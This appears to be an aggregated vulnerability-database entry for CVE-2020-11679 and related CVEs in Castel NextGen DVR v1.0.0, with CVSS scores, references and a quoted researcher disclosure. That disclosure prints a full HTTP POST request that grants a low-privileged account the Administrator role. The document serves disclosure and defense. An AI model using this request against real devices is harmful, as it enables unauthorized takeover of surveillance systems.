Sign-up

ID

VAR-202006-0042


CVE

CVE-2020-11679


TITLE

Castel NextGen DVR Vulnerability related to authority management in

Trust: 0.8

sources: JVNDB: JVNDB-2020-006190

DESCRIPTION

Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account. Castel NextGen DVR Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. The Castel NextGen DVR management function has security vulnerabilities, allowing remote attackers to use the vulnerabilities to submit special requests, elevate permissions, and obtain administrator permissions. All issues are associated with *Castel NextGen DVR v1.0.0 *and have been resolved in v1.0.1*.* ------------------------------- *CVE-2020-11679 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679>* *Original Disclosure* https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass *Description* A low privileged user can call functionality reserved for an Administrator which promotes a low privileged account to the Administrator role: POST /Administration/Users/Edit/:ID HTTP/1.1 > Host: $RHOST > User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 > Firefox/52.0 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-US,en;q=0.5 > Accept-Encoding: gzip, deflate > Cookie: $REVIEWER_COOKIES > DNT: 1 > Connection: close > Upgrade-Insecure-Requests: 1 > Content-Type: application/x-www-form-urlencoded > Content-Length: 349 > UserId=:ID&Email=bypass%40test.com > &FirstName=bypass&LastName=bypass&LDAPUser=false > > &Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false > > &Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false > > &Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false > &Locked=false ------------------------------- *CVE-2020-11680 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680>* *Original Disclosure* https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass *Description* The application does not perform an authorization check before functionality is performed. Low privileged users are prevented from browsing to pages that perform Administrator functionality using GET, however, functionality can be performed by directly crafting the associated POST request. This can be exploited to modify user accounts, modify the application, etc. Combined with the reported CSRF, CVE-2020-11682, any user of the application can be used to grant Administrator access to a malicious user. ------------------------------- *CVE-2020-11681 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681>* *Original Disclosure* https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass *Description* Credentials are returned in cleartext in the source of the SMTP page. If a malicious user compromises an account. or exploits the CSRF to gain access to the application, the associated SMTP server/account could also be compromised. ------------------------------- *CVE-2020-11682 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682>* *Original Disclosure* https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf *Description* The application does not properly prevent CSRF; the __RequestVerificationToken, which is included with state changing requests, is not verified by the application - requests are successful even when the token is removed. AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image: SecurityMetrics]

Trust: 2.34

sources: NVD: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // PACKETSTORM: 157954

IOT TAXONOMY

category:['IoT']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-24898

AFFECTED PRODUCTS

vendor:castelmodel:nextgen dvrscope:eqversion:1.0.0

Trust: 2.4

sources: CNVD: CNVD-2021-24898 // JVNDB: JVNDB-2020-006190 // NVD: CVE-2020-11679

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2020-11679
value: HIGH

Trust: 1.0

NVD: JVNDB-2020-006190
value: HIGH

Trust: 0.8

CNVD: CNVD-2021-24898
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202006-501
value: HIGH

Trust: 0.6

VULMON: CVE-2020-11679
value: MEDIUM

Trust: 0.1

NVD:
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

NVD: JVNDB-2020-006190
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2021-24898
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULMON: CVE-2020-11679
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

NVD:
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: JVNDB-2020-006190
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // NVD: CVE-2020-11679 // CNNVD: CNNVD-202006-501

PROBLEMTYPE DATA

problemtype:CWE-862

Trust: 1.0

problemtype:CWE-269

Trust: 0.8

sources: JVNDB: JVNDB-2020-006190 // NVD: CVE-2020-11679

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202006-501

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202006-501

CONFIGURATIONS

sources:
            
            
            NVD: CVE-2020-11679

PATCH
title:Digital Video Recorder (DVR)url:http://castle-cctv.kr/digital-video-recorder-dvr/
Trust: 0.8
title:Patch for Castel NextGen DVR management function privilege escalation vulnerabilityurl:https://www.cnvd.org.cn/patchinfo/show/255911
Trust: 0.6
title:Castel NextGen DVR Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121159
Trust: 0.6
title:CVEsurl:https://github.com/irbishop/cves 
Trust: 0.1
title:CVEsurl:https://github.com/irbishop/cve 
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2021-24898 // 
            
            
            
            VULMON: CVE-2020-11679 // 
            
            
            
            JVNDB: JVNDB-2020-006190 // 
            
            
            
            CNNVD: CNNVD-202006-501

EXTERNAL IDS
db:NVDid:CVE-2020-11679
Trust: 3.2
db:PACKETSTORMid:157954
Trust: 3.2
db:JVNDBid:JVNDB-2020-006190
Trust: 0.8
db:CNVDid:CNVD-2021-24898
Trust: 0.6
db:CNNVDid:CNNVD-202006-501
Trust: 0.6
db:VULMONid:CVE-2020-11679
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2021-24898 // 
            
            
            
            VULMON: CVE-2020-11679 // 
            
            
            
            JVNDB: JVNDB-2020-006190 // 
            
            
            
            PACKETSTORM: 157954 // 
            
            
            
            NVD: CVE-2020-11679 // 
            
            
            
            CNNVD: CNNVD-202006-501

REFERENCES
url:http://packetstormsecurity.com/files/157954/castel-nextgen-dvr-1.0.0-bypass-csrf-disclosure.html
Trust: 3.7
url:https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass
Trust: 1.8
url:http://seclists.org/fulldisclosure/2020/jun/8
Trust: 1.8
url:https://nvd.nist.gov/vuln/detail/cve-2020-11679
Trust: 1.5
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679
Trust: 0.8
url:https://cwe.mitre.org/data/definitions/862.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://github.com/irbishop/cves
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2020-11680
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679>*
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681>*
Trust: 0.1
url:https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2020-11681
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11680>*
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2020-11682
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11682>*
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2021-24898 // 
            
            
            
            VULMON: CVE-2020-11679 // 
            
            
            
            JVNDB: JVNDB-2020-006190 // 
            
            
            
            PACKETSTORM: 157954 // 
            
            
            
            NVD: CVE-2020-11679 // 
            
            
            
            CNNVD: CNNVD-202006-501

CREDITS
Aaron Bishop
Trust: 0.7
sources:
            
            
            PACKETSTORM: 157954 // 
            
            
            
            CNNVD: CNNVD-202006-501

SOURCES
db:CNVDid:CNVD-2021-24898
db:VULMONid:CVE-2020-11679
db:JVNDBid:JVNDB-2020-006190
db:PACKETSTORMid:157954
db:NVDid:CVE-2020-11679
db:CNNVDid:CNNVD-202006-501

LAST UPDATE DATE
2023-12-18T12:27:28.739000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2021-24898date:2021-04-06T00:00:00
db:VULMONid:CVE-2020-11679date:2021-07-21T00:00:00
db:JVNDBid:JVNDB-2020-006190date:2020-07-02T00:00:00
db:NVDid:CVE-2020-11679date:2021-07-21T11:39:23.747
db:CNNVDid:CNNVD-202006-501date:2021-01-04T00:00:00

SOURCES RELEASE DATE
db:CNVDid:CNVD-2021-24898date:2021-04-04T00:00:00
db:VULMONid:CVE-2020-11679date:2020-06-04T00:00:00
db:JVNDBid:JVNDB-2020-006190date:2020-07-02T00:00:00
db:PACKETSTORMid:157954date:2020-06-05T18:19:24
db:NVDid:CVE-2020-11679date:2020-06-04T19:15:12.693
db:CNNVDid:CNNVD-202006-501date:2020-06-04T00:00:00